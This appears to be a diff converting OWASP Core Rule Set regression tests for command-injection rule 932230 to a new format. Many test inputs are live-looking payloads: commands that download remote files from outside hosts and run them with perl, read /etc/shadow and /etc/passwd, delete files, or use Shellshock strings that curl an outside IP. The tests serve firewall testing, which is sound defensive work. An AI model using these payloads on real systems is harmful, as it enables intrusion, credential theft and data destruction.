"/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 3 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 4 desc: Like 932230-3 but instead of space sign using new line sign stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 5 desc: Another html entity - decimal 9977 (person with ball) with space sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 6 desc: Another html entity - decimal 128 (euro) with new line sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 7 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 8 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 9 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 10 desc: RCE from test 932230.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 11 desc: RCE from test 932230.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 12 desc: RCE from test 932230.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 13 desc: RCE from https://github.com/payloadbox/command-injection-payload-list and html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] + - test_id: 14 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 15 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 16 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 17 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 18 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 19 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 20 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 21 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 22 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] + 